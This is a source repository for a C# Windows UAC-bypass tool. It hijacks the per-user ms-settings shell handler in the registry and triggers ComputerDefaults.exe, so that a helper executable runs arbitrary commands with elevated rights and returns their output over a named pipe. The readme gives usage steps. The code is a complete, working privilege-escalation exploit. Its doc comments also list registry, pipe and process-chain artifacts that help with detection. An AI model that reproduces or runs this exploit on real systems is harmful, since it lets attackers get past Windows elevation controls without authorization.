├── img.png
├── readme.md
├── bypassUAC
├── Properties
│ └── AssemblyInfo.cs
├── bypassUAC.csproj
└── Program.cs
├── PipeClient
├── Properties
│ └── AssemblyInfo.cs
├── Program.cs
└── PipeClient.csproj
└── bypassUAC.sln
/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hzllaga/bypassUAC/HEAD/img.png
--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
1 | # 基于注册表劫持BypassUAC
2 |
3 | 通过管道进行通信,可以在非交互模式运行。
4 |
5 | ## 使用方式
6 |
7 | 将`bypassUAC.exe`和`PipeClient.exe`放在同目录
8 |
9 | ```
10 | .\bypassUAC.exe "whoami /priv"
11 | ```
12 |
13 | 
14 |
15 | ## 参考链接
16 |
17 | https://github.com/SkewwG/domainTools/tree/master/regeditBypassUAC
18 |
19 | https://idiotc4t.com/privilege-escalation/bypassuac-fodhelper
20 |
21 |
--------------------------------------------------------------------------------
/bypassUAC/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// General information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("bypassUAC")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("bypassUAC")]
[assembly: AssemblyCopyright("Copyright © 2020")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM.
// It is the same GUID that bypassUAC.sln uses as this project's identifier.
[assembly: Guid("c165dc03-35dc-4f85-b812-7001d9f4440c")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/PipeClient/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// General information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("PipeClient")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("PipeClient")]
[assembly: AssemblyCopyright("Copyright © 2020")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM.
// It is the same GUID that bypassUAC.sln uses as this project's identifier.
[assembly: Guid("ab6b90cf-7cca-4f73-833f-c21ed071344a")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/bypassUAC.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30114.105
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "bypassUAC", "bypassUAC\bypassUAC.csproj", "{C165DC03-35DC-4F85-B812-7001D9F4440C}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PipeClient", "PipeClient\PipeClient.csproj", "{AB6B90CF-7CCA-4F73-833F-C21ED071344A}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|Any CPU = Debug|Any CPU
13 | Release|Any CPU = Release|Any CPU
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {C165DC03-35DC-4F85-B812-7001D9F4440C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {C165DC03-35DC-4F85-B812-7001D9F4440C}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {C165DC03-35DC-4F85-B812-7001D9F4440C}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | {C165DC03-35DC-4F85-B812-7001D9F4440C}.Release|Any CPU.Build.0 = Release|Any CPU
20 | {AB6B90CF-7CCA-4F73-833F-C21ED071344A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
21 | {AB6B90CF-7CCA-4F73-833F-C21ED071344A}.Debug|Any CPU.Build.0 = Debug|Any CPU
22 | {AB6B90CF-7CCA-4F73-833F-C21ED071344A}.Release|Any CPU.ActiveCfg = Release|Any CPU
23 | {AB6B90CF-7CCA-4F73-833F-C21ED071344A}.Release|Any CPU.Build.0 = Release|Any CPU
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {8F57C9C2-8982-4160-A032-29AF00A39620}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/PipeClient/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.IO.Pipes;
5 |
6 | namespace PipeClient
7 | {
class Program
{
    /// <summary>
    /// Runs <paramref name="command"/> through <c>cmd.exe /c</c> with the console window
    /// suppressed and returns everything the command wrote to standard output.
    /// </summary>
    /// <param name="command">
    /// Command line appended to <c>/c</c> verbatim. There is no quoting, validation or
    /// allow-listing of any kind; a null value simply yields the argument string <c>"/c "</c>.
    /// </param>
    /// <returns>
    /// The complete standard-output text. Standard error is redirected but never read, so
    /// anything the command writes there is discarded.
    /// </returns>
    static string ExecuteProcess(string command = "")
    {
        Process process = new Process();
        process.StartInfo.FileName = "cmd.exe";
        process.StartInfo.CreateNoWindow = true;
        process.StartInfo.UseShellExecute = false;
        // stdin and stderr are redirected but never written to or drained below.
        process.StartInfo.RedirectStandardInput = true;
        process.StartInfo.RedirectStandardOutput = true;
        process.StartInfo.RedirectStandardError = true;
        process.StartInfo.Arguments = "/c " + command;
        process.Start();
        // Reading stdout to completion before WaitForExit avoids blocking on a full stdout
        // pipe; stderr is not drained, so a command that emits a lot of stderr could still stall.
        string output = process.StandardOutput.ReadToEnd();
        process.WaitForExit();
        process.Close();
        return output;
    }
    /// <summary>
    /// Entry point. Connects to the named pipe <c>bypassUAC_____Pipe@</c> (the server side
    /// lives in the bypassUAC project), reads a single line as the command to run, executes
    /// it via <see cref="ExecuteProcess"/>, writes the output back one line at a time and
    /// then sends the literal <c>exit</c> sentinel the server loop waits for.
    /// </summary>
    /// <param name="args">Unused; the command arrives over the pipe, not the command line.</param>
    /// <remarks>
    /// Per the readme, this executable is the one registered under the user's
    /// <c>ms-settings</c> shell handler, so it is normally started by the shell rather than
    /// by a user. Whatever line the pipe peer sends is executed verbatim with this process's
    /// privileges: the peer is not authenticated and the command is not validated. From a
    /// defensive viewpoint the fixed pipe name and the <c>cmd.exe /c</c> child are the
    /// observable artifacts of this side of the exchange.
    /// </remarks>
    static void Main(string[] args)
    {
        using (NamedPipeClientStream client = new NamedPipeClientStream("bypassUAC_____Pipe@"))
        {
            // Connect() with no timeout: blocks until the server creates the pipe.
            client.Connect();
            StreamReader sr = new StreamReader(client);
            StreamWriter sw = new StreamWriter(client);
            // One line == one command; a null (server closed before writing) is passed through as-is.
            string cmd = sr.ReadLine();
            string[] stringSeparators = new string[] { "\r\n" };
            foreach (var line in ExecuteProcess(cmd).Split(stringSeparators, StringSplitOptions.None))
            {
                sw.WriteLine(line);
            }
            // Sentinel is written without a trailing newline; the server relies on its
            // ReadLine surfacing the partial line once this stream is disposed.
            sw.Write("exit");
            sw.Flush();
        }
    }
}
44 | }
--------------------------------------------------------------------------------
/bypassUAC/bypassUAC.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {C165DC03-35DC-4F85-B812-7001D9F4440C}
8 | Exe
9 | bypassUAC
10 | bypassUAC
11 | v4.0
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
--------------------------------------------------------------------------------
/PipeClient/PipeClient.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {AB6B90CF-7CCA-4F73-833F-C21ED071344A}
8 | WinExe
9 | PipeClient
10 | PipeClient
11 | v4.0
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
--------------------------------------------------------------------------------
/bypassUAC/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.IO.Pipes;
5 | using Microsoft.Win32;
6 |
7 | namespace bypassUAC
8 | {
class Program
{
    /// <summary>
    /// Starts <c>ComputerDefaults.exe</c> through <c>cmd.exe /c</c> with no visible window
    /// and returns immediately; the child process is neither waited on nor disposed.
    /// </summary>
    /// <remarks>
    /// This is the trigger for the shell-handler entry written in <see cref="Main"/>: the
    /// readme describes the project as a registry-hijack UAC bypass, so ComputerDefaults.exe
    /// is presumably expected to resolve the <c>ms-settings</c> handler from HKCU and start
    /// PipeClient.exe (that resolution is not visible in this file). stdin/stdout/stderr
    /// are redirected but never used. For detection purposes the observable chain here is
    /// this process → cmd.exe → ComputerDefaults.exe.
    /// </remarks>
    static void ExecuteProcess()
    {
        Process process = new Process();
        process.StartInfo.FileName = "cmd.exe";
        process.StartInfo.CreateNoWindow = true;
        process.StartInfo.UseShellExecute = false;
        process.StartInfo.RedirectStandardInput = true;
        process.StartInfo.RedirectStandardOutput = true;
        process.StartInfo.RedirectStandardError = true;
        process.StartInfo.Arguments = "/c ComputerDefaults.exe";
        process.Start();
    }
    /// <summary>
    /// Entry point. Writes the <c>ms-settings</c> shell handler under the current user's
    /// <c>Software\Classes</c> to point at <c>PipeClient.exe</c> in the current working
    /// directory, opens the named pipe <c>bypassUAC_____Pipe@</c>, launches
    /// ComputerDefaults.exe, sends the command (<c>args[0]</c>, or <c>whoami /priv</c> by
    /// default) to the client that connects, echoes its output until the <c>exit</c>
    /// sentinel, and finally deletes the <c>ms-settings</c> key tree.
    /// </summary>
    /// <param name="args">Optional single command line; only <c>args[0]</c> is used, unvalidated.</param>
    /// <remarks>
    /// Artifacts this leaves for detection and forensics: a write to
    /// <c>HKCU\Software\Classes\ms-settings\shell\open\command</c> (default value = path to
    /// PipeClient.exe, <c>DelegateExecute</c> = empty string), the named pipe above, and the
    /// cmd.exe → ComputerDefaults.exe process chain. Cleanup is happy-path only: if no client
    /// ever connects, <c>WaitForConnection</c> blocks indefinitely and the key is never
    /// removed, and any exception before the delete likewise leaves it in place. The
    /// <c>OpenSubKey</c> chains throw <see cref="NullReferenceException"/> rather than a
    /// descriptive error if <c>Software\Classes</c> cannot be opened writable, and none of
    /// the <see cref="RegistryKey"/> handles are disposed.
    /// </remarks>
    static void Main(string[] args)
    {
        // Whole command line for the remote side; no validation of its content.
        string cmd = args.Length == 0 ? "whoami /priv" :args[0];

        Console.WriteLine("Author: Hzllaga");
        Console.WriteLine("Github: https://github.com/Hzllaga\n");

        // Creates (or reopens) HKCU\Software\Classes\ms-settings\shell\open\command writable.
        // OpenSubKey returns null for a missing/unwritable key, which would NRE on the next call.
        RegistryKey regkey = Registry.CurrentUser
            .OpenSubKey("Software", true)
            .OpenSubKey("Classes", true)
            .CreateSubKey("ms-settings")
            .CreateSubKey("shell")
            .CreateSubKey("open")
            .CreateSubKey("command");
        // `default` is a null value name, i.e. the key's (Default) value. The path is built from
        // the current working directory, not the executable's directory, so it is wrong when
        // this program is started from another folder (the readme requires both exes side by side).
        regkey.SetValue(default, System.Environment.CurrentDirectory + "\\PipeClient.exe");
        // Written as an empty string; what the shell does with this value is not established by this code.
        regkey.SetValue("DelegateExecute", "");

        Console.WriteLine("[+] Registry key write successful.");

        using (NamedPipeServerStream server = new NamedPipeServerStream("bypassUAC_____Pipe@"))
        {
            Console.WriteLine("[+] Pipe server established, waiting for connection.");
            // The pipe must exist before the trigger runs so PipeClient's Connect() has a server to attach to.
            ExecuteProcess();
            Console.WriteLine("[+] Process created.");
            // No timeout: if nothing connects, this blocks forever and the registry cleanup below never runs.
            server.WaitForConnection();
            StreamReader sr = new StreamReader(server);
            StreamWriter sw = new StreamWriter(server);
            Console.WriteLine("[+] Client connected, sending {0} command.", cmd);
            sw.WriteLine(cmd);
            sw.Flush();
            Console.WriteLine("======================================\n");
            string line;
            // Echo lines from the client until its "exit" sentinel or end of stream.
            while ((line = sr.ReadLine()) != null)
            {
                if (line == "exit")
                {
                    Console.WriteLine("\n======================================");
                    server.Disconnect();
                    break;
                }
                else
                {
                    Console.WriteLine(line);
                }

            }
            // Removes the entire ms-settings subtree, including anything that existed there
            // before this run. Not reached if an exception occurred earlier or the wait never returned.
            Registry.CurrentUser
                .OpenSubKey("Software", true)
                .OpenSubKey("Classes", true)
                .DeleteSubKeyTree("ms-settings");
            Console.WriteLine("[+] Registry key clean successful.");
            Console.WriteLine("[+] Enjoy, bye!");
        }
    }
}
78 | }
79 |
--------------------------------------------------------------------------------